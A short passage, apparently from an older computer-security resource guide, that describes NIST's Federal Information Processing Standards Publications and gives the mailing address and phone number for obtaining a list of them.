resources, NIST publishes Federal Information Processing
Standards Publications (FIPS PUBS). These publications deal with
many aspects of computer security, including password usage, data
encryption, ADP risk management and contingency planning, and
computer system security certification and accreditation. A list
of current publications is available from:
Standards Processing Coordinator (ADP)
National Computer Systems Laboratory
National Institute of Standards and Technology
Technology Building, B-64
Gaithersburg, MD 20899
Phone: (301) 975-2817